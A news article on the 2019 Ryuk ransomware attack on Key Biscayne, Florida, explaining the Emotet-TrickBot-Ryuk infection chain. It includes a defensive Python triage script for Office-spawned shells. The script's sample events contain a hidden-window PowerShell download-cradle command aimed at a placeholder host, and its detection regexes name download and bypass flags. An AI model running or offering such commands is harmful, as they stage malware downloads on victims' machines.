The Key Biscayne ransomware attack marks the third attack on a Florida city in just a month. According to city officials, a “data security event” occurred on Sunday, June 23, 2019. IT professionals working for the city decided to take systems offline in an abundance of caution.
The initial compromise occurred when a city employee clicked a malicious attachment in an email.
This latest ransomware attack comes just weeks after the attacks on Riviera Beach and Lake City.
Initial investigations of the city’s systems revealed traces of the Ryuk ransomware. Ryuk is a powerful piece of malware first discovered in August of 2018. This particular piece of malware is often the final piece of a ‘Triple Threat’ attack.
Triple Threat Malware: A Powerful Chain
In a Triple Threat attack, an initial phishing email delivers a malicious attachment. When opened, this attachment executes a PowerShell script that downloads the Emotet trojan. Emotet is a banking trojan, but it is also capable of downloading other components. In this case, attackers used Emotet as a downloader for the main payload, the TrickBot trojan.
TrickBot is a powerful trojan that is used to monitor the victim’s network before the Ryuk ransomware is deployed. This allows the attackers to encrypt the most critical systems and increase the chances of their victims paying the ransom. TrickBot also includes many tools for lateral movement in a victim’s network, including password harvesters and exploits for vulnerabilities such as BlueKeep. In fact, there are an estimated 800,000 systems still vulnerable to BlueKeep.
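The first link in the chain described above, an Office attachment launching PowerShell to fetch the next stage, leaves a recognisable trace in endpoint process-creation telemetry: an Office application as the parent process of a shell, often with a hidden window, an encoded command, or a download cmdlet on the command line. The following script is an added example, not code from the original article or from any vendor named here; it scores constructed, Sysmon-style process-creation events (the field names and sample values are assumptions) and returns the ones a SOC analyst should triage first.

```python
"""Score process-creation events for the Office -> PowerShell stage of the
Emotet/TrickBot/Ryuk chain. Event fields are a simplified, assumed subset of
Sysmon event ID 1; the sample events below are constructed, not real telemetry."""
import re

# Parent processes that should almost never spawn a shell on a user workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child processes a macro typically uses to stage a downloader.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# Command-line traits that each add to the score when present.
SUSPICIOUS_ARGS = [
    (re.compile(r"-e(nc(odedcommand)?)?\b", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
     "network download"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "no profile"),
    (re.compile(r"bypass", re.I), "execution policy bypass"),
]


def _basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def analyze_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    score, reasons = 0, []
    # The parent/child relationship is the strongest signal, so it carries the most weight.
    if parent in OFFICE_PARENTS and image in SHELLS:
        score += 5
        reasons.append(f"{parent} spawned {image}")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(cmd):
            score += 2
            reasons.append(label)
    return score, reasons


def triage(events, threshold=5):
    """Return events scoring at or above threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = analyze_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


# Constructed sample events: two that mimic the macro-to-PowerShell stage, two benign.
SAMPLE_EVENTS = [
    {"host": "WS-01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc <base64-placeholder>"},
    {"host": "WS-02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "WS-03",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -w hidden (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/s')"},
    {"host": "WS-04",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

Run as-is, the script reports WS-01 and WS-03 and ignores the two benign events. The parent/child check alone is enough to cross the default threshold, which is deliberate: an Office application spawning a shell is rare enough on a user workstation that it deserves a look even without a suspicious command line, and it is also the behaviour that mail-gateway macro blocking and endpoint attack-surface-reduction policies are designed to stop before the download ever happens.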
Security researchers commonly attribute the Ryuk malware to the North Korean “Lazarus” group. Lately, however, the same malware has been used by non-state criminal operators for profit.
Small municipalities face significant risk
The Key Biscayne ransomware attack is just one of many ransomware attacks on municipalities. The increasing frequency of such attacks highlights the importance of an effective human firewall.
Key Biscayne has an estimated 3,000 residents, officially making it a village. Attackers are increasingly targeting small municipalities like this because their IT infrastructure is often less well protected.
At this time it is unknown if city officials have decided to pay the ransom, or restore systems from backups.